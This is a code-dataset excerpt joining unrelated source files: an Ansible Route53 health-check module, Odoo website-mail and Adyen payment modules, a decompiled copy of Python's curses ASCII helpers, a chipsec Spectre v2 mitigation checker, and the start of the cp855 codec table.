fqdn: host1.example.com
'''
import time
import uuid
try:
import boto
import boto.ec2
from boto import route53
from boto.route53 import Route53Connection, exception
from boto.route53.healthcheck import HealthCheck
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
# Things that can't get changed:
# protocol
# ip_address or domain
# request_interval
# string_match if not previously enabled
def find_health_check(conn, wanted):
"""Searches for health checks that have the exact same set of immutable values"""
for check in conn.get_list_health_checks().HealthChecks:
config = check.HealthCheckConfig
if config.get('IPAddress') == wanted.ip_addr and config.get('FullyQualifiedDomainName') == wanted.fqdn and config.get('Type') == wanted.hc_type and config.get('RequestInterval') == str(wanted.request_interval):
return check
return None
def to_health_check(config):
return HealthCheck(
config.get('IPAddress'),
config.get('Port'),
config.get('Type'),
config.get('ResourcePath'),
fqdn=config.get('FullyQualifiedDomainName'),
string_match=config.get('SearchString'),
request_interval=int(config.get('RequestInterval')),
failure_threshold=int(config.get('FailureThreshold')),
)
def health_check_diff(a, b):
a = a.__dict__
b = b.__dict__
if a == b:
return {}
diff = {}
for key in set(a.keys()) | set(b.keys()):
if a.get(key) != b.get(key):
diff[key] = b.get(key)
return diff
def to_template_params(health_check):
params = {
'ip_addr_part': '',
'port': health_check.port,
'type': health_check.hc_type,
'resource_path_part': '',
'fqdn_part': '',
'string_match_part': '',
'request_interval': health_check.request_interval,
'failure_threshold': health_check.failure_threshold,
}
if health_check.ip_addr:
params['ip_addr_part'] = HealthCheck.XMLIpAddrPart % {'ip_addr': health_check.ip_addr}
if health_check.resource_path:
params['resource_path_part'] = XMLResourcePathPart % {'resource_path': health_check.resource_path}
if health_check.fqdn:
params['fqdn_part'] = HealthCheck.XMLFQDNPart % {'fqdn': health_check.fqdn}
if health_check.string_match:
params['string_match_part'] = HealthCheck.XMLStringMatchPart % {'string_match': health_check.string_match}
return params
XMLResourcePathPart = """<ResourcePath>%(resource_path)s</ResourcePath>"""
POSTXMLBody = """
<CreateHealthCheckRequest xmlns="%(xmlns)s">
<CallerReference>%(caller_ref)s</CallerReference>
<HealthCheckConfig>
%(ip_addr_part)s
<Port>%(port)s</Port>
<Type>%(type)s</Type>
%(resource_path_part)s
%(fqdn_part)s
%(string_match_part)s
<RequestInterval>%(request_interval)s</RequestInterval>
<FailureThreshold>%(failure_threshold)s</FailureThreshold>
</HealthCheckConfig>
</CreateHealthCheckRequest>
"""
UPDATEHCXMLBody = """
<UpdateHealthCheckRequest xmlns="%(xmlns)s">
<HealthCheckVersion>%(health_check_version)s</HealthCheckVersion>
%(ip_addr_part)s
<Port>%(port)s</Port>
%(resource_path_part)s
%(fqdn_part)s
%(string_match_part)s
<FailureThreshold>%(failure_threshold)i</FailureThreshold>
</UpdateHealthCheckRequest>
"""
def create_health_check(conn, health_check, caller_ref = None):
if caller_ref is None:
caller_ref = str(uuid.uuid4())
uri = '/%s/healthcheck' % conn.Version
params = to_template_params(health_check)
params.update(xmlns=conn.XMLNameSpace, caller_ref=caller_ref)
xml_body = POSTXMLBody % params
response = conn.make_request('POST', uri, {'Content-Type': 'text/xml'}, xml_body)
body = response.read()
boto.log.debug(body)
if response.status == 201:
e = boto.jsonresponse.Element()
h = boto.jsonresponse.XmlHandler(e, None)
h.parse(body)
return e
else:
raise exception.DNSServerError(response.status, response.reason, body)
def update_health_check(conn, health_check_id, health_check_version, health_check):
uri = '/%s/healthcheck/%s' % (conn.Version, health_check_id)
params = to_template_params(health_check)
params.update(
xmlns=conn.XMLNameSpace,
health_check_version=health_check_version,
)
xml_body = UPDATEHCXMLBody % params
response = conn.make_request('POST', uri, {'Content-Type': 'text/xml'}, xml_body)
body = response.read()
boto.log.debug(body)
if response.status not in (200, 204):
raise exception.DNSServerError(response.status,
response.reason,
body)
e = boto.jsonresponse.Element()
h = boto.jsonresponse.XmlHandler(e, None)
h.parse(body)
return e
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
state = dict(choices=['present', 'absent'], default='present'),
ip_address = dict(),
port = dict(type='int'),
type = dict(required=True, choices=['HTTP', 'HTTPS', 'HTTP_STR_MATCH', 'HTTPS_STR_MATCH', 'TCP']),
resource_path = dict(),
fqdn = dict(),
string_match = dict(),
request_interval = dict(type='int', choices=[10, 30], default=30),
failure_threshold = dict(type='int', choices=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10], default=3),
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO:
module.fail_json(msg='boto 2.27.0+ required for this module')
state_in = module.params.get('state')
ip_addr_in = module.params.get('ip_address')
port_in = module.params.get('port')
type_in = module.params.get('type')
resource_path_in = module.params.get('resource_path')
fqdn_in = module.params.get('fqdn')
string_match_in = module.params.get('string_match')
request_interval_in = module.params.get('request_interval')
failure_threshold_in = module.params.get('failure_threshold')
if ip_addr_in is None and fqdn_in is None:
module.fail_json(msg="parameter 'ip_address' or 'fqdn' is required")
# Default port
if port_in is None:
if type_in in ['HTTP', 'HTTP_STR_MATCH']:
port_in = 80
elif type_in in ['HTTPS', 'HTTPS_STR_MATCH']:
port_in = 443
else:
module.fail_json(msg="parameter 'port' is required for 'type' TCP")
# string_match in relation with type
if type_in in ['HTTP_STR_MATCH', 'HTTPS_STR_MATCH']:
if string_match_in is None:
module.fail_json(msg="parameter 'string_match' is required for the HTTP(S)_STR_MATCH types")
elif len(string_match_in) > 255:
module.fail_json(msg="parameter 'string_match' is limited to 255 characters max")
elif string_match_in:
module.fail_json(msg="parameter 'string_match' argument is only for the HTTP(S)_STR_MATCH types")
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module)
# connect to the route53 endpoint
try:
conn = Route53Connection(**aws_connect_kwargs)
except boto.exception.BotoServerError, e:
module.fail_json(msg = e.error_message)
changed = False
action = None
check_id = None
wanted_config = HealthCheck(ip_addr_in, port_in, type_in, resource_path_in, fqdn_in, string_match_in, request_interval_in, failure_threshold_in)
existing_check = find_health_check(conn, wanted_config)
if existing_check:
check_id = existing_check.Id
existing_config = to_health_check(existing_check.HealthCheckConfig)
if state_in == 'present':
if existing_check is None:
action = "create"
check_id = create_health_check(conn, wanted_config).HealthCheck.Id
changed = True
else:
diff = health_check_diff(existing_config, wanted_config)
if not diff:
action = "update"
update_health_check(conn, existing_check.Id, int(existing_check.HealthCheckVersion), wanted_config)
changed = True
elif state_in == 'absent':
if check_id:
action = "delete"
conn.delete_health_check(check_id)
changed = True
else:
module.fail_json(msg = "Logic Error: Unknown state")
module.exit_json(changed=changed, health_check=dict(id=check_id), action=action)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
main()
| gpl-3.0 |
vileopratama/vitech | src/addons/website_sale/controllers/website_mail.py | 26 | 2245 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import urlparse
from openerp import SUPERUSER_ID
from openerp import http
from openerp.addons.web.http import request
from openerp.addons.website_mail.controllers.main import WebsiteMail
class WebsiteMailController(WebsiteMail):
@http.route(['/website_mail/post/json'], type='json', auth='public', website=True)
def chatter_json(self, res_model='', res_id=None, message='', **kw):
params = kw.copy()
params.pop('rating', False)
message_data = super(WebsiteMailController, self).chatter_json(res_model=res_model, res_id=res_id, message=message, **params)
if message_data and kw.get('rating') and res_model == 'product.template': # restrict rating only for product template
rating = request.env['rating.rating'].create({
'rating': float(kw.get('rating')),
'res_model': res_model,
'res_id': res_id,
'message_id': message_data['id'],
})
message_data.update({
'rating_default_value': rating.rating,
'rating_disabled': True,
})
return message_data
@http.route(['/website_mail/post/post'], type='http', methods=['POST'], auth='public', website=True)
def chatter_post(self, res_model='', res_id=None, message='', redirect=None, **kw):
params = kw.copy()
params.pop('rating')
response = super(WebsiteMailController, self).chatter_post(res_model=res_model, res_id=res_id, message=message, redirect=redirect, **params)
if kw.get('rating') and res_model == 'product.template': # restrict rating only for product template
try:
fragment = urlparse.urlparse(response.location).fragment
message_id = int(fragment.replace('message-', ''))
rating = request.env['rating.rating'].create({
'rating': float(kw.get('rating')),
'res_model': res_model,
'res_id': res_id,
'message_id': message_id,
})
except Exception:
pass
return response
| mit |
DarthMaulware/EquationGroupLeaks | Leak #5 - Lost In Translation/windows/Resources/Python/Core/Lib/curses/ascii.py | 1 | 2365 | # uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: ascii.py
"""Constants and membership tests for ASCII characters"""
NUL = 0
SOH = 1
STX = 2
ETX = 3
EOT = 4
ENQ = 5
ACK = 6
BEL = 7
BS = 8
TAB = 9
HT = 9
LF = 10
NL = 10
VT = 11
FF = 12
CR = 13
SO = 14
SI = 15
DLE = 16
DC1 = 17
DC2 = 18
DC3 = 19
DC4 = 20
NAK = 21
SYN = 22
ETB = 23
CAN = 24
EM = 25
SUB = 26
ESC = 27
FS = 28
GS = 29
RS = 30
US = 31
SP = 32
DEL = 127
controlnames = [
'NUL', 'SOH', 'STX', 'ETX', 'EOT', 'ENQ', 'ACK', 'BEL',
'BS', 'HT', 'LF', 'VT', 'FF', 'CR', 'SO', 'SI',
'DLE', 'DC1', 'DC2', 'DC3', 'DC4', 'NAK', 'SYN', 'ETB',
'CAN', 'EM', 'SUB', 'ESC', 'FS', 'GS', 'RS', 'US',
'SP']
def _ctoi(c):
if type(c) == type(''):
return ord(c)
else:
return c
def isalnum(c):
return isalpha(c) or isdigit(c)
def isalpha(c):
return isupper(c) or islower(c)
def isascii(c):
return _ctoi(c) <= 127
def isblank(c):
return _ctoi(c) in (8, 32)
def iscntrl(c):
return _ctoi(c) <= 31
def isdigit(c):
return _ctoi(c) >= 48 and _ctoi(c) <= 57
def isgraph(c):
return _ctoi(c) >= 33 and _ctoi(c) <= 126
def islower(c):
return _ctoi(c) >= 97 and _ctoi(c) <= 122
def isprint(c):
return _ctoi(c) >= 32 and _ctoi(c) <= 126
def ispunct(c):
return _ctoi(c) != 32 and not isalnum(c)
def isspace(c):
return _ctoi(c) in (9, 10, 11, 12, 13, 32)
def isupper(c):
return _ctoi(c) >= 65 and _ctoi(c) <= 90
def isxdigit(c):
return isdigit(c) or _ctoi(c) >= 65 and _ctoi(c) <= 70 or _ctoi(c) >= 97 and _ctoi(c) <= 102
def isctrl(c):
return _ctoi(c) < 32
def ismeta(c):
return _ctoi(c) > 127
def ascii(c):
if type(c) == type(''):
return chr(_ctoi(c) & 127)
else:
return _ctoi(c) & 127
def ctrl(c):
if type(c) == type(''):
return chr(_ctoi(c) & 31)
else:
return _ctoi(c) & 31
def alt(c):
if type(c) == type(''):
return chr(_ctoi(c) | 128)
else:
return _ctoi(c) | 128
def unctrl(c):
bits = _ctoi(c)
if bits == 127:
rep = '^?'
elif isprint(bits & 127):
rep = chr(bits & 127)
else:
rep = '^' + chr((bits & 127 | 32) + 32)
if bits & 128:
return '!' + rep
return rep | unlicense |
mycodeday/crm-platform | payment_adyen/models/adyen.py | 21 | 7729 | # -*- coding: utf-'8' "-*-"
import base64
try:
import simplejson as json
except ImportError:
import json
from hashlib import sha1
import hmac
import logging
import urlparse
from openerp.addons.payment.models.payment_acquirer import ValidationError
from openerp.addons.payment_adyen.controllers.main import AdyenController
from openerp.osv import osv, fields
from openerp.tools import float_round
_logger = logging.getLogger(__name__)
class AcquirerAdyen(osv.Model):
_inherit = 'payment.acquirer'
def _get_adyen_urls(self, cr, uid, environment, context=None):
""" Adyen URLs
- yhpp: hosted payment page: pay.shtml for single, select.shtml for multiple
"""
return {
'adyen_form_url': 'https://%s.adyen.com/hpp/pay.shtml' % environment,
}
def _get_providers(self, cr, uid, context=None):
providers = super(AcquirerAdyen, self)._get_providers(cr, uid, context=context)
providers.append(['adyen', 'Adyen'])
return providers
_columns = {
'adyen_merchant_account': fields.char('Merchant Account', required_if_provider='adyen'),
'adyen_skin_code': fields.char('Skin Code', required_if_provider='adyen'),
'adyen_skin_hmac_key': fields.char('Skin HMAC Key', required_if_provider='adyen'),
}
def _adyen_generate_merchant_sig(self, acquirer, inout, values):
""" Generate the shasign for incoming or outgoing communications.
:param browse acquirer: the payment.acquirer browse record. It should
have a shakey in shaky out
:param string inout: 'in' (openerp contacting ogone) or 'out' (adyen
contacting openerp). In this last case only some
fields should be contained (see e-Commerce basic)
:param dict values: transaction values
:return string: shasign
"""
assert inout in ('in', 'out')
assert acquirer.provider == 'adyen'
if inout == 'in':
keys = "paymentAmount currencyCode shipBeforeDate merchantReference skinCode merchantAccount sessionValidity shopperEmail shopperReference recurringContract allowedMethods blockedMethods shopperStatement merchantReturnData billingAddressType deliveryAddressType offset".split()
else:
keys = "authResult pspReference merchantReference skinCode merchantReturnData".split()
def get_value(key):
if values.get(key):
return values[key]
return ''
sign = ''.join('%s' % get_value(k) for k in keys).encode('ascii')
key = acquirer.adyen_skin_hmac_key.encode('ascii')
return base64.b64encode(hmac.new(key, sign, sha1).digest())
def adyen_form_generate_values(self, cr, uid, id, partner_values, tx_values, context=None):
base_url = self.pool['ir.config_parameter'].get_param(cr, uid, 'web.base.url')
acquirer = self.browse(cr, uid, id, context=context)
# tmp
import datetime
from dateutil import relativedelta
tmp_date = datetime.date.today() + relativedelta.relativedelta(days=1)
adyen_tx_values = dict(tx_values)
adyen_tx_values.update({
'merchantReference': tx_values['reference'],
'paymentAmount': '%d' % int(float_round(tx_values['amount'], 2) * 100),
'currencyCode': tx_values['currency'] and tx_values['currency'].name or '',
'shipBeforeDate': tmp_date,
'skinCode': acquirer.adyen_skin_code,
'merchantAccount': acquirer.adyen_merchant_account,
'shopperLocale': partner_values['lang'],
'sessionValidity': tmp_date,
'resURL': '%s' % urlparse.urljoin(base_url, AdyenController._return_url),
})
if adyen_tx_values.get('return_url'):
adyen_tx_values['merchantReturnData'] = json.dumps({'return_url': '%s' % adyen_tx_values.pop('return_url')})
adyen_tx_values['merchantSig'] = self._adyen_generate_merchant_sig(acquirer, 'in', adyen_tx_values)
return partner_values, adyen_tx_values
def adyen_get_form_action_url(self, cr, uid, id, context=None):
acquirer = self.browse(cr, uid, id, context=context)
return self._get_adyen_urls(cr, uid, acquirer.environment, context=context)['adyen_form_url']
class TxAdyen(osv.Model):
_inherit = 'payment.transaction'
_columns = {
'adyen_psp_reference': fields.char('Adyen PSP Reference'),
}
# --------------------------------------------------
# FORM RELATED METHODS
# --------------------------------------------------
def _adyen_form_get_tx_from_data(self, cr, uid, data, context=None):
reference, pspReference = data.get('merchantReference'), data.get('pspReference')
if not reference or not pspReference:
error_msg = 'Adyen: received data with missing reference (%s) or missing pspReference (%s)' % (reference, pspReference)
_logger.error(error_msg)
raise ValidationError(error_msg)
# find tx -> @TDENOTE use pspReference ?
tx_ids = self.pool['payment.transaction'].search(cr, uid, [('reference', '=', reference)], context=context)
if not tx_ids or len(tx_ids) > 1:
error_msg = 'Adyen: received data for reference %s' % (reference)
if not tx_ids:
error_msg += '; no order found'
else:
error_msg += '; multiple order found'
_logger.error(error_msg)
raise ValidationError(error_msg)
tx = self.pool['payment.transaction'].browse(cr, uid, tx_ids[0], context=context)
# verify shasign
shasign_check = self.pool['payment.acquirer']._adyen_generate_merchant_sig(tx.acquirer_id, 'out', data)
if shasign_check != data.get('merchantSig'):
error_msg = 'Adyen: invalid merchantSig, received %s, computed %s' % (data.get('merchantSig'), shasign_check)
_logger.warning(error_msg)
raise ValidationError(error_msg)
return tx
def _adyen_form_get_invalid_parameters(self, cr, uid, tx, data, context=None):
invalid_parameters = []
# reference at acquirer: pspReference
if tx.acquirer_reference and data.get('pspReference') != tx.acquirer_reference:
invalid_parameters.append(('pspReference', data.get('pspReference'), tx.acquirer_reference))
# seller
if data.get('skinCode') != tx.acquirer_id.adyen_skin_code:
invalid_parameters.append(('skinCode', data.get('skinCode'), tx.acquirer_id.adyen_skin_code))
# result
if not data.get('authResult'):
invalid_parameters.append(('authResult', data.get('authResult'), 'something'))
return invalid_parameters
def _adyen_form_validate(self, cr, uid, tx, data, context=None):
status = data.get('authResult', 'PENDING')
if status == 'AUTHORISED':
tx.write({
'state': 'done',
'adyen_psp_reference': data.get('pspReference'),
# 'date_validate': data.get('payment_date', fields.datetime.now()),
# 'paypal_txn_type': data.get('express_checkout')
})
return True
elif status == 'PENDING':
tx.write({
'state': 'pending',
'adyen_psp_reference': data.get('pspReference'),
})
return True
else:
error = 'Paypal: feedback error'
_logger.info(error)
tx.write({
'state': 'error',
'state_message': error
})
return False
| gpl-3.0 |
johnloucaides/chipsec | chipsec/modules/common/cpu/spectre_v2.py | 5 | 11764 | #CHIPSEC: Platform Security Assessment Framework
#Copyright (c) 2018, Eclypsium, Inc.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
"""
The module checks if system includes hardware mitigations for Speculative Execution Side Channel.
Specifically, it verifies that the system supports CPU mitigations for
Branch Target Injection vulnerability a.k.a. Spectre Variant 2 (CVE-2017-5715)
The module checks if the following hardware mitigations are supported by the CPU
and enabled by the OS/software:
1. Indirect Branch Restricted Speculation (IBRS) and Indirect Branch Predictor Barrier (IBPB):
CPUID.(EAX=7H,ECX=0):EDX[26] == 1
2. Single Thread Indirect Branch Predictors (STIBP):
CPUID.(EAX=7H,ECX=0):EDX[27] == 1
IA32_SPEC_CTRL[STIBP] == 1
3. Enhanced IBRS:
CPUID.(EAX=7H,ECX=0):EDX[29] == 1
IA32_ARCH_CAPABILITIES[IBRS_ALL] == 1
IA32_SPEC_CTRL[IBRS] == 1
@TODO:
4. Mitigation for Rogue Data Cache Load (RDCL):
CPUID.(EAX=7H,ECX=0):EDX[29] == 1
IA32_ARCH_CAPABILITIES[RDCL_NO] == 1
In addition to checking if CPU supports and OS enables all mitigations, we need to check
that relevant MSR bits are set consistently on all logical processors (CPU threads).
The module returns the following results:
FAILED : IBRS/IBPB is not supported
WARNING: IBRS/IBPB is supported
enhanced IBRS is not supported
WARNING: IBRS/IBPB is supported
enhanced IBRS is supported
enhanced IBRS is not enabled by the OS
WARNING: IBRS/IBPB is supported
STIBP is not supported or not enabled by the OS
PASSED : IBRS/IBPB is supported
enhanced IBRS is supported
enhanced IBRS is enabled by the OS
STIBP is supported
STIBP is enabled by the OS
Notes:
- The module returns WARNING when CPU doesn't support enhanced IBRS
Even though OS/software may use basic IBRS by setting IA32_SPEC_CTRL[IBRS] when necessary,
we have no way to verify this
- The module returns WARNING when CPU supports enhanced IBRS but OS doesn't set IA32_SPEC_CTRL[IBRS]
Under enhanced IBRS, OS can set IA32_SPEC_CTRL[IBRS] once to take advantage of IBRS protection
- The module returns WARNING when CPU doesn't support STIBP or OS doesn't enable it
Per Speculative Execution Side Channel Mitigations:
"enabling IBRS prevents software operating on one logical processor from controlling
the predicted targets of indirect branches executed on another logical processor.
For that reason, it is not necessary to enable STIBP when IBRS is enabled"
- OS/software may implement "retpoline" mitigation for Spectre variant 2
instead of using CPU hardware IBRS/IBPB
@TODO: we should verify CPUID.07H:EDX on all logical CPUs as well
because it may differ if ucode update wasn't loaded on all CPU cores
Hardware registers used:
CPUID.(EAX=7H,ECX=0):EDX[26] - enumerates support for IBRS and IBPB
CPUID.(EAX=7H,ECX=0):EDX[27] - enumerates support for STIBP
CPUID.(EAX=7H,ECX=0):EDX[29] - enumerates support for the IA32_ARCH_CAPABILITIES MSR
IA32_ARCH_CAPABILITIES[IBRS_ALL] - enumerates support for enhanced IBRS
IA32_ARCH_CAPABILITIES[RCDL_NO] - enumerates support RCDL mitigation
IA32_SPEC_CTRL[IBRS] - enable control for enhanced IBRS by the software/OS
IA32_SPEC_CTRL[STIBP] - enable control for STIBP by the software/OS
References:
- Reading privileged memory with a side-channel by Jann Horn, Google Project Zero:
https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html
- Spectre:
https://spectreattack.com/spectre.pdf
- Meltdown:
https://meltdownattack.com/meltdown.pdf
- Speculative Execution Side Channel Mitigations:
https://software.intel.com/sites/default/files/managed/c5/63/336996-Speculative-Execution-Side-Channel-Mitigations.pdf
- Retpoline: a software construct for preventing branch-target-injection:
https://support.google.com/faqs/answer/7625886
"""
from chipsec.module_common import *
from chipsec.hal import cpu
import chipsec.helper.oshelper
import chipsec.defines
TAGS = [MTAG_CPU,MTAG_HWCONFIG,MTAG_SMM]
class spectre_v2(BaseModule):
def __init__(self):
BaseModule.__init__(self)
def is_supported(self):
return True
def check_spectre_mitigations( self ):
try:
cpu_thread_count = self.cs.msr.get_cpu_thread_count()
except:
cpu_thread_count = 1
#
# Read CPUID Leaf 07H
#
(r_eax, r_ebx, r_ecx, r_edx) = self.cs.cpu.cpuid( 0x7, 0x0 )
ibrs_ibpb_supported = (r_edx & chipsec.defines.BIT26) > 0
stibp_supported = (r_edx & chipsec.defines.BIT27) > 0
arch_cap_supported = (r_edx & chipsec.defines.BIT29) > 0
self.logger.log( "[*] CPUID.7H:EDX[26] = %d Indirect Branch Restricted Speculation (IBRS) & Predictor Barrier (IBPB)" % ibrs_ibpb_supported )
self.logger.log( "[*] CPUID.7H:EDX[27] = %d Single Thread Indirect Branch Predictors (STIBP)" % stibp_supported )
self.logger.log( "[*] CPUID.7H:EDX[29] = %d IA32_ARCH_CAPABILITIES" % arch_cap_supported )
if ibrs_ibpb_supported: self.logger.log_good( "CPU supports IBRS and IBPB" )
else: self.logger.log_bad( "CPU doesn't support IBRS and IBPB" )
if stibp_supported: self.logger.log_good( "CPU supports STIBP" )
else: self.logger.log_bad( "CPU doesn't support STIBP" )
if not self.cs.is_register_defined( 'IA32_ARCH_CAPABILITIES' ) or \
not self.cs.is_register_defined( 'IA32_SPEC_CTRL' ):
self.logger.error( "couldn't find definition of required MSRs" )
return ModuleResult.ERROR
if arch_cap_supported:
ibrs_enh_supported = True
#rdcl_mitigation_supported = True
self.logger.log( "[*] checking enhanced IBRS support in IA32_ARCH_CAPABILITIES..." )
for tid in range(cpu_thread_count):
arch_cap_msr = 0
try:
arch_cap_msr = self.cs.read_register( 'IA32_ARCH_CAPABILITIES', tid )
except chipsec.helper.oshelper.HWAccessViolationError:
self.logger.error( "couldn't read IA32_ARCH_CAPABILITIES" )
ibrs_enh_supported = False
break
ibrs_all = self.cs.get_register_field( 'IA32_ARCH_CAPABILITIES', arch_cap_msr, 'IBRS_ALL' )
self.logger.log( "[*] cpu%d: IBRS_ALL = %x" % (tid, ibrs_all) )
if 0 == ibrs_all:
ibrs_enh_supported = False
break
# @TODO: this checks for RDCL aka Meltdown (Variant 3) mitigation
#self.logger.log( "[*] cpu%d: checking RDCL mitigation support..." % tid )
#rdcl_no = self.cs.get_register_field( 'IA32_ARCH_CAPABILITIES', arch_cap_msr, 'RDCL_NO' )
#self.logger.log( "[*] cpu%d: RDCL_NO = %x" % (tid, rdcl_no) )
#if 0 == rdcl_no:
# rdcl_mitigation_supported = False
# break
if ibrs_enh_supported: self.logger.log_good( "CPU supports enhanced IBRS (on all logical CPU)" )
else: self.logger.log_bad( "CPU doesn't support enhanced IBRS" )
#if rdcl_mitigation_supported: self.logger.log_good( "CPU supports mitigation for Rogue Data Cache Load (RDCL)" )
#else: self.logger.log_bad( "CPU doesn't support mitigation for Rogue Data Cache Load (RDCL)" )
else:
ibrs_enh_supported = False
self.logger.log_bad( "CPU doesn't support enhanced IBRS" )
ibrs_enabled = True
stibp_enabled = True
if ibrs_enh_supported:
self.logger.log( "[*] checking if OS is using Enhanced IBRS..." )
for tid in range(cpu_thread_count):
spec_ctrl_msr = 0
try:
spec_ctrl_msr = self.cs.read_register( 'IA32_SPEC_CTRL', tid )
except chipsec.helper.oshelper.HWAccessViolationError:
self.logger.error( "couldn't read IA32_SPEC_CTRL" )
ibrs_enabled = stibp_enabled = False
break
ibrs = self.cs.get_register_field( 'IA32_SPEC_CTRL', spec_ctrl_msr, 'IBRS' )
self.logger.log( "[*] cpu%d: IA32_SPEC_CTRL[IBRS] = %x" % (tid, ibrs) )
if 0 == ibrs:
ibrs_enabled = False
# ok to access STIBP bit even if STIBP is not supported
stibp = self.cs.get_register_field( 'IA32_SPEC_CTRL', spec_ctrl_msr, 'STIBP' )
self.logger.log( "[*] cpu%d: IA32_SPEC_CTRL[STIBP] = %x" % (tid, stibp) )
if 0 == stibp:
stibp_enabled = False
if ibrs_enabled: self.logger.log_good( "OS enabled Enhanced IBRS (on all logical processors)" )
else: self.logger.log_bad( "OS doesn't seem to use Enhanced IBRS" )
if stibp_enabled: self.logger.log_good( "OS enabled STIBP (on all logical processors)" )
else: self.logger.log_bad( "OS doesn't seem to use STIBP" )
#
# Combining results of all checks into final decision
#
# FAILED : IBRS/IBPB is not supported
# WARNING: IBRS/IBPB is supported
# enhanced IBRS is not supported
# WARNING: IBRS/IBPB is supported
# enhanced IBRS is supported
# enhanced IBRS is not enabled by the OS
# WARNING: IBRS/IBPB is supported
# STIBP is not supported or not enabled by the OS
# PASSED : IBRS/IBPB is supported
# enhanced IBRS is supported
# enhanced IBRS is enabled by the OS
# STIBP is supported
# STIBP is enabled by the OS
#
if not ibrs_ibpb_supported:
res = ModuleResult.FAILED
self.logger.log_failed_check( "CPU mitigation (IBRS) is missing" )
elif not ibrs_enh_supported:
res = ModuleResult.WARNING
self.logger.log_warn_check( "CPU supports mitigation (IBRS) but doesn't support enhanced IBRS" )
elif ibrs_enh_supported and (not ibrs_enabled):
res = ModuleResult.WARNING
self.logger.log_warn_check( "CPU supports mitigation (enhanced IBRS) but OS is not using it" )
else:
if (not stibp_supported) or (not stibp_enabled):
res = ModuleResult.WARNING
self.logger.log_warn_check( "CPU supports mitigation (enhanced IBRS) but STIBP is not supported/enabled" )
else:
res = ModuleResult.PASSED
self.logger.log_passed_check( "CPU and OS support hardware mitigations (enhanced IBRS and STIBP)" )
self.logger.log_important( "OS may be using software based mitigation (eg. retpoline)" )
return res
# --------------------------------------------------------------------------
# run( module_argv )
# Required function: run here all tests from this module
# --------------------------------------------------------------------------
def run( self, module_argv ):
self.logger.start_test( "Checks for Branch Target Injection / Spectre v2 (CVE-2017-5715)" )
return self.check_spectre_mitigations()
| gpl-2.0 |
PaulKinlan/cli-caniuse | site/app/scripts/bower_components/jsrepl-build/extern/python/reloop-closured/lib/python2.7/encodings/cp855.py | 593 | 34106 | """ Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP855.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_map)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='cp855',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x0452, # CYRILLIC SMALL LETTER DJE
0x0081: 0x0402, # CYRILLIC CAPITAL LETTER DJE
0x0082: 0x0453, # CYRILLIC SMALL LETTER GJE
0x0083: 0x0403, # CYRILLIC CAPITAL LETTER GJE
0x0084: 0x0451, # CYRILLIC SMALL LETTER IO
0x0085: 0x0401, # CYRILLIC CAPITAL LETTER IO
0x0086: 0x0454, # CYRILLIC SMALL LETTER UKRAINIAN IE
0x0087: 0x0404, # CYRILLIC CAPITAL LETTER UKRAINIAN IE
0x0088: 0x0455, # CYRILLIC SMALL LETTER DZE
0x0089: 0x0405, # CYRILLIC CAPITAL LETTER DZE
0x008a: 0x0456, # CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
0x008b: 0x0406, # CYRILLIC CAPITAL LETTER BYELORUSSIAN-UKRAINIAN I
0x008c: 0x0457, # CYRILLIC SMALL LETTER YI
0x008d: 0x0407, # CYRILLIC CAPITAL LETTER YI
0x008e: 0x0458, # CYRILLIC SMALL LETTER JE
0x008f: 0x0408, # CYRILLIC CAPITAL LETTER JE
0x0090: 0x0459, # CYRILLIC SMALL LETTER LJE
0x0091: 0x0409, # CYRILLIC CAPITAL LETTER LJE
0x0092: 0x045a, # CYRILLIC SMALL LETTER NJE
0x0093: 0x040a, # CYRILLIC CAPITAL LETTER NJE
0x0094: 0x045b, # CYRILLIC SMALL LETTER TSHE
0x0095: 0x040b, # CYRILLIC CAPITAL LETTER TSHE
0x0096: 0x045c, # CYRILLIC SMALL LETTER KJE
0x0097: 0x040c, # CYRILLIC CAPITAL LETTER KJE
0x0098: 0x045e, # CYRILLIC SMALL LETTER SHORT U
0x0099: 0x040e, # CYRILLIC CAPITAL LETTER SHORT U
0x009a: 0x045f, # CYRILLIC SMALL LETTER DZHE
0x009b: 0x040f, # CYRILLIC CAPITAL LETTER DZHE
0x009c: 0x044e, # CYRILLIC SMALL LETTER YU
0x009d: 0x042e, # CYRILLIC CAPITAL LETTER YU
0x009e: 0x044a, # CYRILLIC SMALL LETTER HARD SIGN
0x009f: 0x042a, # CYRILLIC CAPITAL LETTER HARD SIGN
0x00a0: 0x0430, # CYRILLIC SMALL LETTER A
0x00a1: 0x0410, # CYRILLIC CAPITAL LETTER A
0x00a2: 0x0431, # CYRILLIC SMALL LETTER BE
